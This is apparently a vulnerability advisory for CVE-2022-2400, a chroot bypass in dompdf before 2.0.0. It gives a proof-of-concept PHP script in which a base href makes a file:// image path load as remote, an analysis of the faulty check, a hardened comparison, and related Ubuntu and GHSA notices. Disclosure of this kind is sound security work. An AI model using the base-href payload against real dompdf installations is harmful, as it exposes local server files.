CVE-2022-2400: External Control of File Name or Path in dompdf

External Control of File Name or Path in GitHub repository dompdf/dompdf prior to 2.0.0.


Description

The Scenario 3 you described in this report (https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/) actually opens up the ability to bypass chroot checks.

Proof of Concept

1: Install Dompdf from GitHub (https://github.com/dompdf/dompdf/) and use the following as dompdf/autoload.inc.php:

<?php
/**
 * @package dompdf
 * @link    http://dompdf.github.com/
 * @author  Benj Carson <[email protected]>
 * @author  Fabien Ménager <[email protected]>
 * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License
 */

// HTML5 Parser
require_once __DIR__ . '/lib/html5lib/Parser.php';

// Sabberworm
spl_autoload_register(function($class)
{
    if (strpos($class, 'Sabberworm') !== false) {
        $file = str_replace('\\', DIRECTORY_SEPARATOR, $class);
        $file = realpath(__DIR__ . '/lib/php-css-parser/lib/' . (empty($file) ? '' : DIRECTORY_SEPARATOR) . $file . '.php');
        if (file_exists($file)) {
            require_once $file;
            return true;
        }
    }
    return false;
});

// php-font-lib
require_once __DIR__ . '/lib/php-font-lib/src/FontLib/Autoloader.php';

//php-svg-lib
require_once __DIR__ . '/lib/php-svg-lib/src/autoload.php';


/*
 * New PHP 5.3.0 namespaced autoloader
 */
require_once __DIR__ . '/src/Autoloader.php';

Dompdf\Autoloader::register();

2: Place a sample image file cat.jpg at /var/www/html/cat.jpg (any photo will do).

3: Create vuln2.php:

<?php
// Include autoloader 
require_once 'dompdf/autoload.inc.php'; 

// Reference the Dompdf namespace 
use Dompdf\Dompdf; 
use Dompdf\Options;

$options = new Options();
$options->set('isRemoteEnabled', true);

$dompdf = new Dompdf($options);

// Load HTML content 
$dompdf->loadHtml('<base href="http://example.com"><img src="file:///var/www/html/cat.jpg" />');

// (Optional) Setup the paper size and orientation
$dompdf->setPaper('A4', 'landscape'); 
 
// Render the HTML as PDF 
$dompdf->render(); 
 
// Output the generated PDF to Browser 
$dompdf->stream(); 

?>

If you open vuln2.php in a browser, the generated PDF includes cat.jpg even though the chroot option is not set.

Impact

This vulnerability bypasses the chroot checks, essentially leading to disclosure of PNG and JPEG files. This was tested with allow_url_fopen enabled, on Linux, on a fresh install of dompdf.

Analysis

This bug occurs because of the check on Line 68:

$remote = ($protocol && $protocol !== "file://") || ($parsed_url['protocol'] != "");

Here $protocol is the document's base protocol, which the <base href="http://example.com"> element in the PoC sets to http://. The first clause therefore evaluates to true regardless of the image URL's own scheme:

($protocol && $protocol !== "file://") => true ( http:// !== file:// )

Therefore file:///var/www/html/cat.jpg is treated as a remote file and fetched without going through the chroot checks.
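The following is an added example (not dompdf's own code or its patch) that models the quoted decision in a few lines and places a hardened decision beside it: remoteness is derived from the resource URL's own scheme, and any local path is confined to a $chroot list of directories. As the analysis implies, the model assumes the resource's own protocol field is empty for file:// URLs; $chroot and the function names are assumptions of this example.

```php
<?php
// Added example (not dompdf's code): model of the vulnerable remote/local decision
// quoted in the analysis, beside a hardened decision that checks the resource itself.
// Assumption (as the report implies): the resource's protocol field is empty for file:// URLs.

/** Vulnerable: "remote" (chroot skipped) whenever the document base protocol is not file://. */
function is_remote_vulnerable(string $base_protocol, string $resource_url): bool
{
    $scheme = strtolower((string) parse_url($resource_url, PHP_URL_SCHEME));
    $resource_protocol = ($scheme === '' || $scheme === 'file') ? '' : $scheme . '://';
    return ($base_protocol && $base_protocol !== 'file://') || ($resource_protocol !== '');
}

/**
 * Hardened: classify by the resource URL's own scheme (only scheme-less references inherit
 * the base protocol) and always confine local paths to the $chroot directories.
 * Returns ['remote' => bool, 'allowed' => bool, 'path' => string].
 */
function classify_hardened(string $base_protocol, string $resource_url, array $chroot): array
{
    $scheme = strtolower((string) parse_url($resource_url, PHP_URL_SCHEME));
    if ($scheme === '') {                       // relative reference: inherits the base protocol
        $scheme = rtrim(strtolower($base_protocol), ':/');
    }
    if ($scheme !== '' && $scheme !== 'file') {
        return ['remote' => true, 'allowed' => true, 'path' => $resource_url];
    }
    // Local resource: strip file://, canonicalise, and require a chroot directory as prefix.
    $path = preg_replace('#^file://#i', '', $resource_url);
    $real = realpath($path);
    $allowed = false;
    if ($real !== false) {
        foreach ($chroot as $dir) {
            $dir = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;  // no prefix tricks
            if (strncmp($real, $dir, strlen($dir)) === 0) {
                $allowed = true;
                break;
            }
        }
    }
    return ['remote' => false, 'allowed' => $allowed, 'path' => $real === false ? $path : $real];
}

// The report's scenario: <base href="http://example.com"> plus <img src="file:///var/www/html/cat.jpg">
$base = 'http://';
$img  = 'file:///var/www/html/cat.jpg';
var_dump(is_remote_vulnerable($base, $img));          // bool(true): the chroot check is skipped
var_dump(classify_hardened($base, $img, [__DIR__]));  // remote false; allowed only under __DIR__
```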

Related news

Ubuntu Security Notice USN-6277-2

Ubuntu Security Notice 6277-2 - USN-6277-1 fixed vulnerabilities in Dompdf. This update provides the corresponding updates for Ubuntu 22.04 LTS. It was discovered that Dompdf was not properly validating untrusted input when processing HTML content under certain circumstances. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code. This issue only affected Ubuntu 16.04 LTS.

Ubuntu Security Notice USN-6277-1

Ubuntu Security Notice 6277-1 - It was discovered that Dompdf was not properly validating untrusted input when processing HTML content under certain circumstances. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code. This issue only affected Ubuntu 16.04 LTS. It was discovered that Dompdf was not properly validating processed HTML content that referenced PHAR files, which could result in the deserialization of untrusted data. An attacker could possibly use this issue to execute arbitrary code.

GHSA-5qj8-6xxj-hp9h: Dompdf before v2.0.0 vulnerable to chroot check bypass

Dompdf prior to version 2.0.0 is vulnerable to a chroot check bypass, which could cause disclosure of png and jpeg files.
